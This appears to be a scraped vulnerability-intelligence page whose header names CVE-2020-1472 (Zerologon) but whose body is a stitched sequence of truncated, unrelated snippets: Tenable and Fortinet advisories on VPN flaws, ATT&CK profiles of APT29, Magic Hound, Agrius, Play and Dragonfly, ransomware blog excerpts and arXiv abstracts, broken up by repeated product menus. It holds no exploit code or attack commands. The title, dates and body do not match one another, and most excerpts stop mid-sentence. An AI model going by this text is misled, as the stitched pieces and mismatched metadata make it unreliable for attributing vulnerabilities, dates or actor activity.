[MEDIUM] CVE-2020-1472: Advanced Persistent Threat Actors Use Zerologon Vulnerability In Exploit Chain with Unpatched Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
APT 29 Targeting SSL VPN Flaws
blogs_fortinet·2020-07-16·CVSS 9.1
[CRITICAL] APT 29 Targeting SSL VPN Flaws
PSIRT BLOGS
APT 29 Targeting SSL VPN Flaws
By Carl Windsor | July 16, 2020
United Kingdom’s National Cyber Security Centre (NCSC) and Canada’s Communications Security Establishment (CSE) have published research into the activity of ‘APT29’, also known as ‘the Dukes’ or ‘Cozy Bear’ who have been targeting various organisations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines.
The initial attack vectors for this group has been unpatched vulnerabilities in SSL-VPN solutions including Fortinet. One of the vectors used included a vulnerability resolved by Fortinet in May 2019, allowed an unauthenticated at
Tenable
CVE-2020-2021: Palo Alto Networks PAN-OS Vulnerable to Critical Authentication Bypass Vulnerability
blogs_tenable·2020-06-29·CVSS 10.0
[CRITICAL] CVE-2020-2021: Palo Alto Networks PAN-OS Vulnerable to Critical Authentication Bypass Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
blogs_tenable·2020-04-13
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Management (CSPM)
Compliance
Cyber insurance
Data Security Posture Management (DSPM)
Google Cloud security
Infrastructure as Code (IaC) security
Kubernetes Security Pos
Tenable
How COVID-19 Response Is Expanding the Cyberattack Surface
blogs_tenable·2020-03-30
How COVID-19 Response Is Expanding the Cyberattack Surface
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
FortiOS and SSL Vulnerabilities
blogs_fortinet·2019-08-28·CVSS 9.1
[CRITICAL] FortiOS and SSL Vulnerabilities
PSIRT BLOGS
FortiOS and SSL Vulnerabilities
By Fortinet | August 28, 2019
At the recent Black Hat 2019 conference held in Las Vegas this past August 3-8, security researchers discussed their discovery of security vulnerabilities that impacted several security vendors, including Fortinet. All of the vulnerabilities impacting Fortinet were fixed in April and May of 2019.
SSL VPN Vulnerabilities
Two of the vulnerabilities directly affected Fortinet’s implementation of SSL VPN. They are:
CVE-2018-13379 (FG-IR-18-384) – This is a path traversal vulnerability in the FortiOS SSL VPN web portal that could potentially allow an unauthenticated attacker to download files through specially crafted HTTP resource requests.
CVE-2018-13383 (FG-IR-18-388) – This heap buffer overflow vulnerability in t
Tenable
CVE-2018-13379, CVE-2019-11510: FortiGate and Pulse Connect Secure Vulnerabilities Exploited In the Wild
blogs_tenable·2019-08-27·CVSS 9.1
[CRITICAL] CVE-2018-13379, CVE-2019-11510: FortiGate and Pulse Connect Secure Vulnerabilities Exploited In the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
Beware of Emails Purporting to be from the IRS
blogs_fortinet·2018-09-17
Beware of Emails Purporting to be from the IRS
FORTIGUARD LABS THREAT RESEARCH
Beware of Emails Purporting to be from the IRS
By FortiGuard SE Team | September 17, 2018
FortiGuard SE team has come across a peculiar phishing campaign purporting to be from the United States Internal Revenue Service (IRS), which is titled “2018 UPDATE: NON RESIDENT ALIEN TAX WITHHOLDING (IRS ).”
Peculiar because we are almost five months from the original tax deadline of April 15th in the United States. However, since individuals are allowed a six-month extension to provide more time to file, the final deadline is October 15th, which is now approaching. Such a campaign is likely to net an unwitting victim who is not aware of such scams, especially if they are a non-resident alien unfamiliar with US laws and procedures.
Before we take a look at this at
Fortinet
Critical SamSam Ransomware Update
blogs_fortinet·2018-07-31
Critical SamSam Ransomware Update
FORTIGUARD LABS THREAT RESEARCH
Critical SamSam Ransomware Update
By FortiGuard SE Team | July 31, 2018
In conjunction with the Cyber Threat Alliance, Sophos today released a detailed analysis of a highly sophisticated ransomware threat group that has been dubbed “SamSam.” As part of Fortinet’s membership with the Cyber Threat Alliance (CTA), FortiGuard Labs received all related indicators of compromise (IoCs) ahead of publication to ensure that FortiGuard customers are protected from this latest disclosure. The SamSam ransomware first appeared in late 2015 as a reasonably low-profile risk. Since then, however, it has aggressively expanded, targeting a wide range of organizations, from healthcare and educational institutions to local governments. Sophos has estimated that, to date, the g
Threat Intel
APT29 (APT29, IRON RITUAL, IRON HEMLOCK)
threat_intel
APT29 (APT29, IRON RITUAL, IRON HEMLOCK)
# Threat Actor Profile: APT29
ATT&CK ID: G0016
Also known as: APT29, IRON RITUAL, IRON HEMLOCK, NobleBaron, Dark Halo, NOBELIUM, UNC2452, YTTRIUM, The Dukes, Cozy Bear, CozyDuke, SolarStorm, Blue Kitsune, UNC3524, Midnight Blizzard
Suspected origin: Russia
## Overview
APT29 is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. APT29 reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DN
Threat Intel
Magic Hound (Magic Hound, TA453, COBALT ILLUSION)
threat_intel·CVSS 9.1
[CRITICAL] Magic Hound (Magic Hound, TA453, COBALT ILLUSION)
# Threat Actor Profile: Magic Hound
ATT&CK ID: G0059
Also known as: Magic Hound, TA453, COBALT ILLUSION, Charming Kitten, ITG18, Phosphorus, Newscaster, APT35, Mint Sandstorm
Suspected origin: Iran
## Overview
Magic Hound is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Pr
Greynoiseio
Battling Ransomware One Tag At A Time
blogs_greynoiseio
Battling Ransomware One Tag At A Time
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Recorded Future
Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
blogs_recorded_future
Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
# Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
In response to the COVID-19 pandemic, many organizations have shifted to working from home for the foreseeable future — this means that organizations will have a largely (or entirely) remote workforce for the first time.
This creates a situation that is ripe for cybercriminals and nation-state actors to exploit. As we have observed with the rapid adoption of COVID-19-themed scams and attacks against the Olympics, threat actors — both nation-state and cybercriminal — are quick to exploit new and evolving situations.
For security teams, the sudden change in an organization’s network topology means a vastly expanded attack surface with little time to adapt to the new reality. For employees, generally,
Sentinelone
REvil
blogs_sentinelone
REvil
# REvil Ransomware: In-Depth Analysis, Detection, and Mitigation
As if ransomware itself wasn’t dangerous enough, a new type of attack involving ransomware is making waves in the cybersecurity community. Ransomware-as-a-Service (RaaS) operations are becoming more common and more profitable for threat actors looking to launch a variety of attacks. One such operation is known as REvil, and involved a core team of threat actors offering the malware to other attackers for a price.
Although the Russian Federal Security Service claims to have dismantled REvil and charged several of the ransomware group’s members, a deeper look at this type of ransomware and RaaS can help organizations protect themselves against these types of attacks in the future.
## What Is REvil Ransomware?
REvil ransomwa
Threat Intel
Agrius (Agrius, Pink Sandstorm, AMERICIUM)
threat_intel·CVSS 9.1
[CRITICAL] Agrius (Agrius, Pink Sandstorm, AMERICIUM)
# Threat Actor Profile: Agrius
ATT&CK ID: G1030
Also known as: Agrius, Pink Sandstorm, AMERICIUM, Agonizing Serpens, BlackShadow
Suspected origin: Iran
## Overview
Agrius is an Iranian threat actor active since 2020 notable for a series of ransomware and wiper operations in the Middle East, with an emphasis on Israeli targets.(Citation: SentinelOne Agrius 2021)(Citation: CheckPoint Agrius 2023) Public reporting has linked Agrius to Iran's Ministry of Intelligence and Security (MOIS).(Citation: Microsoft Iran Cyber 2023)
## Techniques (TTPs)
### Resource Development
- T1583 Acquire Infrastructure
Usage: Agrius typically uses commercial VPN services for anonymizing last-hop traffic to victim networks, such as ProtonVPN.(Citation: SentinelOne Agrius 2021)
### Initial Access
- T1078.002 Do
Threat Intel
Play (Play)
threat_intel·CVSS 9.1
[CRITICAL] Play (Play)
# Threat Actor Profile: Play
ATT&CK ID: G1040
Also known as: Play
## Overview
Play is a ransomware group that has been active since at least 2022 deploying Playcrypt ransomware against the business, government, critical infrastructure, healthcare, and media sectors in North America, South America, and Europe. Play actors employ a double-extortion model, encrypting systems after exfiltrating data, and are presumed by security researchers to operate as a closed group.(Citation: CISA Play Ransomware Advisory December 2023)(Citation: Trend Micro Ransomware Spotlight Play July 2023)
## Techniques (TTPs)
### Resource Development
- T1587.001 Malware
Usage: Play developed and employ Playcrypt ransomware.(Citation: Trend Micro Ransomware Spotlight Play July 2023)(Citation: CISA Play Ransomware A
Recorded Future
Semiconductor Companies Targeted by Ransomware | Recorded Future
blogs_recorded_future
Semiconductor Companies Targeted by Ransomware | Recorded Future
## Semiconductor Companies Targeted by Ransomware
This report examines ransomware attacks on semiconductor companies to date in 2022. We analyzed the strategic importance of the semiconductor industry and the unique role it plays in the increasingly complex geopolitical environment. We also identified the tactics, techniques, and procedures (TTPs) used by ransomware actors in their attacks.
## Executive Summary
We identified 8 semiconductor companies that were attacked and extorted by ransomware actors thus far in 2022. These attacks included the use of LockBit, LV ransomware, and Cuba ransomware, and were conducted by extortion groups including the Lapsus$ Group and RansomHouse. We analyzed the TTPs of each group and the possible motivations behind the attack. In addition, we explored
Recorded Future
Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
blogs_recorded_future
Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
## Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
In response to the COVID-19 pandemic, many organizations have shifted to working from home for the foreseeable future — this means that organizations will have a largely (or entirely) remote workforce for the first time.
This creates a situation that is ripe for cybercriminals and nation-state actors to exploit. As we have observed with the rapid adoption of COVID-19-themed scams and attacks against the Olympics , threat actors — both nation-state and cybercriminal — are quick to exploit new and evolving situations.
For security teams, the sudden change in an organization’s network topology means a vastly expanded attack surface with little time to adapt to the new reality. For employees, generally
Threat Intel
Dragonfly (Dragonfly, TEMP.Isotope, DYMALLOY)
threat_intel
Dragonfly (Dragonfly, TEMP.Isotope, DYMALLOY)
# Threat Actor Profile: Dragonfly
ATT&CK ID: G0035
Also known as: Dragonfly, TEMP.Isotope, DYMALLOY, Berserk Bear, TG-4192, Crouching Yeti, IRON LIBERTY, Energetic Bear, Ghost Blizzard, BROMINE
Suspected origin: Russia
## Overview
Dragonfly is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, Dragonfly has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 201
Recorded Future
In Before The Lock: ESXi | Recorded Future
blogs_recorded_future
In Before The Lock: ESXi | Recorded Future
## In Before The Lock: ESXi
## Executive Summary
As organizations continue virtualizing their critical infrastructure and business systems, threat actors deploying ransomware have responded in kind. Between 2021 and 2022 we observed an approximately 3-fold increase in ransomware targeting ESXi , with offerings available from many groups including ALPHV, LockBit, and BlackBasta. We identified and described detection strategies for multiple TTPs that are often seen prior to the dropping of the ransomware payload in order to create detections and mitigations that are based on real-world, threat-actor use of these tools. In addition to providing tool-specific detections such as YARA and Sigma rules, we also identified detections for common enumeration, exploitation, and persistence technique
Sentinelone
Avaddon
blogs_sentinelone·CVSS 9.1
[CRITICAL] Avaddon
# Avaddon Ransomware: In-Depth Analysis, Detection, and Mitigation
## Summary of Avaddon Ransomware
Avaddon RaaS (Ransomware-as-a-service) emerged in early 2019. Avaddon practices double extortion – demanding payment for a decryptor, as well as for the non-release of stolen data. Avaddon was advertised heavily in underground markets. Avaddon, as a selling point, provided affiliates with a higher percentage of profit than some other contemporary services.
In 2021, Avaddon “shut down” and released decryption keys for all existing victims.
## What Does Avaddon Ransomware Target?
Avaddon ransomware has been observed targeting businesses in various industries, including healthcare, government, financial, legal, hospitality, education, and retail. Additionally, some Avaddon affiliates have
Huntress
The Top Four CVEs Attackers Exploit | Huntress
blogs_huntress·CVSS 9.8
[CRITICAL] The Top Four CVEs Attackers Exploit | Huntress
While the move to remote work last year gave many of us comforts such as working in our pajamas and being 10 steps away from the fridge, it’s been a bit of a nightmare for those who work in cybersecurity.
The Institute for Security and Technology reports that in 2020, the victims of ransomware attacks paid $350M in ransom—a more than 300% increase over the previous year. By this year’s end, it’s predicted that cybercrime will cost the world $6 trillion. While cybercrime is a lucrative gig for hackers, it's expensive for the rest of us—and unfortunately, it's only getting worse with remote work.
In many ways, remote work has removed many of the security measures that organizations typically put in place to keep their data and networks secure. For example, corporate networks usually only a
Recorded Future
Semiconductor Companies Targeted by Ransomware
blogs_recorded_future
Semiconductor Companies Targeted by Ransomware
# Semiconductor Companies Targeted by Ransomware
Editor’s Note: The following post is an excerpt of a full report. To read the entire analysis, click here to download the report as a PDF.
This report examines ransomware attacks on semiconductor companies to date in 2022. We analyzed the strategic importance of the semiconductor industry and the unique role it plays in the increasingly complex geopolitical environment. We also identified the tactics, techniques, and procedures (TTPs) used by ransomware actors in their attacks.
#### Executive Summary
We identified 8 semiconductor companies that were attacked and extorted by ransomware actors thus far in 2022. These attacks included the use of LockBit, LV ransomware, and Cuba ransomware, and were conducted by extortion groups including th
Recorded Future
In Before The Lock: ESXi
blogs_recorded_future
In Before The Lock: ESXi
# In Before The Lock: ESXi
Editor’s Note: This is an excerpt of a full report. To read the entire analysis with endnotes, click here to download the report as a PDF.
## Executive Summary
As organizations continue virtualizing their critical infrastructure and business systems, threat actors deploying ransomware have responded in kind. Between 2021 and 2022 we observed an approximately 3-fold increase in ransomware targeting ESXi, with offerings available from many groups including ALPHV, LockBit, and BlackBasta. We identified and described detection strategies for multiple TTPs that are often seen prior to the dropping of the ransomware payload in order to create detections and mitigations that are based on real-world, threat-actor use of these tools. In addition to providing tool-speci
arXiv
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
arxiv_fulltext·2025-02-16
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
Yuning Jiang
[email protected]
0000-0003-4791-8452
National University of Singapore
Singapore
Nay Oo
[email protected]
NCS Cyber Special Ops R&D
Singapore
Qiaoran Meng
[email protected]
National University of Singapore
Singapore
Hoon Wei Lim
[email protected]
NCS Cyber Special Ops R&D
Singapore
Biplab Sikdar
[email protected]
National University of Singapore
Singapore
Jiang et al.
## Abstract
As interconnected systems proliferate, safeguarding complex infrastructures against an escalating array of cyber threats has become an urgent challenge. The growing number of vulnerabilities, coupled with resource constraints, makes addressing every vulnerability impractical, thereby rende
arXiv
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
arxiv_fulltext·2024-07-31
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Raveen Kanishka Jayalath*
University of Adelaide, Australia
[email protected]
Hussain Ahmad* *Authors contributed equally to this work. Corresponding author.
University of Adelaide, Australia
[email protected]
Diksha Goel
CSIRO's Data61, Australia
[email protected]
3cmMuhammad Shuja Syed
3cmSLB, USA
[email protected]
Faheem Ullah
University of Adelaide, Australia
[email protected]
plain
## Abstract
Microservice architectures are revolutionizing both small businesses and large corporations, igniting a new era of innovation with their exceptional advantages in maintainability, reusability, and scalability. However, these benefits come w
2019-06-04
Published
2021-11-03
Added to CISA KEV
Exploited in the wild